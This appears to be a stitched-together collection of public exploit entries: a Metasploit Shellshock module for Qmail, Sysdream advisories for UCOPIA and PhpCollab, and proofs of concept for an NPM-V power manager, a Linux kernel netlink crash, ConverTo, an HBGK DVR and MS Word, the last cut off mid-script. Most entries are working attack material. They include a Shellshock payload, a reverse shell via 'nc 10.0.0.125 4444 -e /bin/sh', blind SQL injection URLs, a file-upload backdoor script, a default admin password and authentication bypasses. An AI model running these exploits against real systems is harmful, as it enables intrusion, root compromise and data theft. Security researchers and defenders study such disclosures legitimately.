FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended
An attacker can see the whole query and the injection point. This can also be
used for error-based data extraction.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for Shellshock (CVE-2014-6271) reached
# through Qmail's handling of the SMTP MAIL FROM address.
#
# Defender notes, drawn from the module itself:
#   * The indicator on the wire is a MAIL FROM address that begins with the
#     bash function-definition prefix "() { :; }; ".
#   * Per the description below, exploitation needs /bin/sh linked to a
#     vulnerable bash and a valid RCPT TO address; a build that enforces a
#     well-formed MAILFROM (the "qmailrocks" version is named) is not affected.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Smtp

  # Registers the module metadata (name, description, references, payload
  # constraints, single automatic target) and removes the MAILFROM option;
  # exploit builds its own MAIL FROM line.
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
      'Description' => %q{
This module exploits a shellshock vulnerability on Qmail, a public
domain MTA written in C that runs on Unix systems.
Due to the lack of validation on the MAIL FROM field, it is possible to
execute shell code on a system with a vulnerable BASH (Shellshock).
This flaw works on the latest Qmail versions (qmail-1.03 and
netqmail-1.06).
However, in order to execute code, /bin/sh has to be linked to bash
(usually default configuration) and a valid recipient must be set on the
RCPT TO field (usually admin@exampledomain.com).
The exploit does not work on the "qmailrocks" community version
as it ensures the MAILFROM field is well-formed.
},
      'Author' =>
        [
          'Mario Ledo (Metasploit module)',
          'Gabriel Follon (Metasploit module)',
          'Kyle George (Vulnerability discovery)'
        ],
      'License' => MSF_LICENSE,
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'References' =>
        [
          ['CVE', '2014-6271'],
          ['CWE', '94'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
          ['URL', 'https://lists.gt.net/qmail/users/138578']
        ],
      'Payload' =>
        {
          # 0x3e is '>'; presumably excluded because it would close the
          # <...> address that carries the payload.
          'BadChars' => "\x3e",
          'Space' => 888,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet perl ruby python'
              # The telnet, ruby, python and perl payloads work only if that
              # interpreter is installed on the target.
            }
        },
      'Targets' => [ [ 'Automatic', { }] ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))
    deregister_options('MAILFROM')
  end

  # Writes +data+ to the SMTP socket and reads one reply.
  #
  # Returns a two-element array [reply_text, code], where code is the integer
  # parsed from the first three characters of the reply. On a connection
  # error the code is 0; on any other exception the error is printed and
  # [nil, 0] is returned.
  def smtp_send(data = nil)
    begin
      result = ''
      code = 0
      sock.put("#{data}")
      result = sock.get_once
      result.chomp! if (result)
      code = result[0..2].to_i if result
      return result, code
    rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
      return result, 0
    rescue ::Exception => e
      # Catch-all: report the error instead of raising.
      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
      return nil, 0
    end
  end

  # Runs one SMTP dialogue: HELO, MAIL FROM (carrying the payload), RCPT TO,
  # DATA, then a short message body. After each step the reply code must lie
  # in 200..300 (200..354 for the first DATA); otherwise the run is aborted
  # with fail_with.
  def exploit
    # Recipient address comes from the MAILTO option.
    to = datastore['MAILTO']
    connect
    result = smtp_send("HELO localhost\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    print_status('Sending the payload...')
    # The address starts with the function-definition prefix "() { :; }; ";
    # backslashes in the encoded payload are rewritten by gsub! first.
    result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    print_status("Sending RCPT TO #{to}")
    result = smtp_send("rcpt to:<#{to}>\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    result = smtp_send("data\r\n")
    if result[1] < 200 || result[1] > 354
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    # Message body, ended by the lone "." line.
    result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    disconnect
  end
end
# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
## Asset Description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
Shell Escape via `less` command.
**Threat**
Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
**CVE ID**: CVE-2017-11321
**Access Vector**: network
**Security Risk**: critical
**Vulnerability**: CWE-78
**CVSS Base Score**: 9.1 (Critical)
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: Restricted Shell Escape
By default, the UCOPIA wireless appliance exposes two shell access points, on port 22 (SSH) and port 222 (ShellInTheBox).
A documented **admin** user exists on the system with the password **bhu85tgb**.
Quoted from the documentation :
> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.
By logging in through either of these interfaces, we get access to a restricted shell (*clish*) that allows only a few commands.
However, the `less` command is allowed, and because `less` can execute shell commands while viewing a file, we can use it to escape the restricted shell.
Steps :
**1/** Login to the appliance using SSH or ShellInTheBox.
**2/** Run the `less /etc/passwd` command.
**3/** When viewing the file, type `!sh`
**4/** You now have unrestricted `admin` user access to the appliance.
```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledges the vulnerabilities.
* 21/06/2017 : Sysdream Labs requests an ETA, warning of public disclosure.
* 21/06/2017 : Vendor says that UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## SQL injections
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
**CVE ID**: CVE-2017-6089
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-89
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
## Proof of Concept 1
The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):
```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```
### Vulnerable code
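The vulnerable code is found in `topics/deletetopics.php`, line 9. In the excerpt, `$id` is concatenated into both `DELETE` statements without quoting, escaping or parameter binding.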
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
$pieces = explode(",",$id);
$num = count($pieces);
connectSql("$tmpquery1");
connectSql("$tmpquery2");
```
## Proof of Concept 2
The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
## Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
**Notes**
The application likely lacks a general defense against injection, so other parameters and pages may be vulnerable. This advisory is not intended to be an exhaustive list of vulnerable parameters.
## Solution
Update to the latest version available.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab asks to wait before publication.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
## Asset description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
CHROOT escape and privileges escalation.
**Threat**
Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
**CVE ID**: CVE-2017-11322
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 8.2 (High)
**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: chroot escape / privileges escalation
The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
```
$ chroothole_client '/usr/sbin/status'
is not running ... failed !
$ chroothole_client '/usr/sbin/status $(which nc)'
/bin/nc is not running ... failed!
$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
```
Attacker terminal :
```
$ ncat -lvp 4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.1:49156.
whoami
root
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledges the vulnerabilities.
* 21/06/2017 : Sysdream Labs requests an ETA, warning of public disclosure.
* 21/06/2017 : Vendor says that UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## Arbitrary File Upload
The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
**CVE ID**: CVE-2017-6090
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-434
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------154934846911423734231554128137--
```
### Vulnerable code
The vulnerable code is found in `clients/editclient.php`, line 63.
```
// The extension is taken (lower-cased) from the client-supplied file name;
// no allow-list is applied and the file content is not inspected.
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
// The upload is stored as ../logos_clients/<id>.<extension>. The advisory
// shows that directory being served over HTTP, so a .php upload is executed
// when requested. Errors from the move are silenced by '@'.
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
    // 0666: readable and writable by owner, group and others.
    chmod("../logos_clients/".$id.".$extension",0666);
    // $extension and $id are interpolated into the SQL text without escaping
    // or parameter binding.
    $tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
    connectSql("$tmpquery");
}
// Review note: the missing controls here are an authentication check before
// the upload, an allow-list of image extensions with content verification,
// and bound query parameters.
```
### Exploit code
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
# Proof-of-concept driver for CVE-2017-6090 as published in the advisory.
# Takes three arguments (base URL, id, local file path), posts the file to
# clients/editclient.php and then requests the stored copy under logos_clients/.
# Defender note: neither request below carries a cookie or credential, so the
# access-log pattern is an unauthenticated POST to editclient.php with
# action=update followed by a GET of /logos_clients/<id><extension>.
if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)
target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
# 'upload' is the multipart field name that the quoted PHP reads via $_FILES['upload'].
# The file handle opened here is never closed explicitly.
backdoor = {'upload': open(sys.argv[3], 'rb')}
# The response to the POST is not inspected; r is overwritten by the GET below.
r = requests.post(target, files=backdoor)
# The stored name is rebuilt from the id argument plus the local file's extension.
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
# A 200 on the stored path is the only success criterion used here.
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```
## Solution
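Update to the latest version available. Until the update is applied, restrict access to `clients/editclient.php` and configure the web server not to execute scripts from the `logos_clients/` directory.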
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: NPM-V
Affected Version : 2.4.1 and below
Vendor : http://www.china-clever.com
Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
Date: 2017 Sep 25
Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
[*] NPM Introduction:
The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
controlling and managements to many equipments in the rack cabinet of data center all over the world through
LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
or SNMP
[*] Vulnerability Details:
A security check of this device showed that the Device Admin Console does not enforce authentication:
an attacker can access the management console pages directly, without authenticating.
All files in the following directories are directly accessible: /log/, /chart, /device and /user.
[*] PoC:
An attacker can directly access the page below and add a user, view passwords or change the administrator credentials without authentication.
Browsing to this page shows an HTML page like the image on page 13 (Figure 1-4) of the device user manual.
http://[Device IP]/user/user.html
#EOF
/*
# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
# Date: 2017-Oct-02
# Exploit Author: Wang Chenyu (Nanyang Technological University)
# Version:Linux kernel 4-14-rc1
# Tested on:Ubuntu 16.04 desktop amd64
# CVE : CVE-2017-14489
# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
discovered by Syzkaller. Provided for legal security research and testing
purposes ONLY.
In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
nlh->nlmsg_len.
POC:
*/
#include <sys/socket.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
/* NETLINK_USER is defined but not referenced by main() below, which opens NETLINK_ISCSI. */
#define NETLINK_USER 31
#define MAX_PAYLOAD 1024 /* maximum payload size*/
/* File-scope state used by main(); as globals these objects start zero-initialised. */
struct sockaddr_nl src_addr, dest_addr;
struct nlmsghdr *nlh = NULL;
struct iovec iov;
int sock_fd;
struct msghdr msg;
/*
 * Proof of concept for CVE-2017-14489 (local denial of service): opens a
 * NETLINK_ISCSI raw socket, sends one crafted netlink message to the kernel
 * and then waits for a reply.
 *
 * Only socket() is checked for failure; the results of bind(), malloc(),
 * sendmsg() and recvmsg() are ignored. getpid() and close() are called
 * although <unistd.h> is not in the include list above.
 */
int main()
{
sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
if(sock_fd<0)
return -1;
memset(&src_addr, 0, sizeof(src_addr));
src_addr.nl_family = AF_NETLINK;
src_addr.nl_pid = getpid(); /* self pid */
bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
/* dest_addr is zeroed twice; the second call is redundant. */
memset(&dest_addr, 0, sizeof(dest_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.nl_family = AF_NETLINK;
dest_addr.nl_pid = 0; /* For Linux Kernel */
dest_addr.nl_groups = 0; /* unicast */
nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
/*
 * The header declares 0xac bytes while iov_len below hands 0xc0 bytes to
 * sendmsg(), so the datagram is longer than the first message claims.
 * Presumably this is the "skb->len > nlh->nlmsg_len" condition named in
 * the header comment; confirm against the referenced patch.
 */
nlh->nlmsg_len = 0xac;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
iov.iov_base = (void *)nlh;
iov.iov_len = 0xc0;
msg.msg_name = (void *)&dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
printf("Sending message to kernel\n");
/* In the crash log on this page the oops is raised inside this sendmsg() call path. */
sendmsg(sock_fd,&msg,0);
printf("Waiting for message from kernel\n");
/* Read message from kernel */
/* The same msg/iov/nlh buffer that was just sent is reused to receive the reply. */
recvmsg(sock_fd, &msg, 0);
printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
close(sock_fd);
}
Crash info:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at
0000000000000028
[ 17.881586] IP: skb_release_data+0x77/0x110
[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
[ 17.882743] Oops: 0002 [#1] SMP
[ 17.883123] Modules linked in:
[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
ffffffff820f96a0
[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
000000000000000c
[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
ffffc90000e13ad8
[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
0000000000000000
[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
0000000000000000
[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
knlGS:0000000000000000
[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
00000000000006e0
[ 17.892629] Call Trace:
[ 17.892833] skb_release_all+0x1f/0x30
[ 17.893140] consume_skb+0x27/0x90
[ 17.893418] netlink_unicast+0x16a/0x210
[ 17.893735] netlink_sendmsg+0x2a3/0x390
[ 17.894050] sock_sendmsg+0x33/0x40
[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
[ 17.895009] ? __wake_up+0xe/0x10
[ 17.895280] ? tty_write_unlock+0x2c/0x30
[ 17.895606] ? tty_ldisc_deref+0x11/0x20
[ 17.895925] ? n_tty_open+0xd0/0xd0
[ 17.896211] ? __vfs_write+0x23/0x130
[ 17.896512] __sys_sendmsg+0x40/0x70
[ 17.896805] ? __sys_sendmsg+0x40/0x70
[ 17.897133] SyS_sendmsg+0xd/0x20
[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
[ 17.897783] RIP: 0033:0x7f7614886320
[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
000000000000002e
[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
00007f7614886320
[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
0000000000000003
[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
0000000000000000
[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000400b9e
[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
0000000000400b9e
[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
[ 17.903689] CR2: 0000000000000028
[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
Reference:
[1] https://patchwork.kernel.org/patch/9923803/
[2] https://github.com/google/syzkaller
# # # # #
# Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
# Dork: N/A
# Date: 29.09.2017
# Vendor Homepage: https://codecanyon.net/user/lemonadeflirt
# Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966
# Demo: http://vd.googglet.com/
# Version: 1.4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
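# The vulnerability allows an attacker to download arbitrary files: in the excerpt below, the `token` parameter is base64-decoded into `$url` with no visible check on what it points to.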
#
# Vulnerable Source:
#
# .............
# <?php
#
# include_once('.......php');
# // Check download token
# if (empty($_GET['mime']) OR empty($_GET['token']))
# {
# exit('Invalid download token 8{');
# }
#
# // Set operation params
# $mime = filter_var($_GET['mime']);
# $ext = str_replace(array('/', 'x-'), '', strstr($mime, '/'));
# $url = base64_decode(filter_var($_GET['token']));
# $name = urldecode($_GET['title']). '.' .$ext;
#
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]
#
# Etc...
# # # # #
# Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass
# Date: 24-09-2017
# Vendor Homepage: http://www.hbgk.net/en/
# Exploit Author: RAT - ThiefKing
# Contact: https://www.facebook.com/cctvsuperpassword
# Website: http://tromcap.com
# Category: webapps
# Tested on: V2.3.1 build20160927, V3.0.0 build20161206
# Shodan Dork: NVR Webserver
1. Description
- It is possible to log in as any registered user by editing the userInfo cookie, because the password in the cookie is not checked.
2. Proof of Concept
- When login successful: DVR save cookie : userInfo + webport with
value: base64 encode (user:pass)
Ex: http://dvr-domain.dynns.com:85 --> When login successful (user:
admin, pass: admin), DVR will save cookie: userInfo85 with value
YWRtaW46YWRtaW4= (admin:admin <-- base64 decode)
However, the DVR does not check the password stored in the cookie. Without
logging in, adding a cookie userInfoXX (XX: web port) with the value base64
encode (admin:any words) and then opening
http://dvr-domain.dynns.com:XX/doc/page/main.asp bypasses authentication.
3. Solution:
Update to Firmware version V3.0.0 build20170925
Title: MS Office Word Information Disclosure Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..
The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:
c:\users\%username%\AppData\Local\Microsoft\Windows
Instructions:
a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.
c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.
Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.
-------------Disclose_File.WPS------------------------------------------------------------
<html><body>
<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->
<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>
<script language=javascript>
// Reads this document's own URL to work out where it was saved, then either re-opens
// itself through the loopback C$ share or reads one local file and shows it in an alert box.
// Defender note: in this PoC the file contents only reach alert(); nothing here sends them elsewhere.
var loc = document.location.href.toLowerCase();
// Drops the first 8 characters of the URL before searching for path separators.
var locNoProtocol = loc.substring(8,loc.length);
// Character code 47 is "/"; b1..b4 are the positions of the first four slashes that follow.
var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);
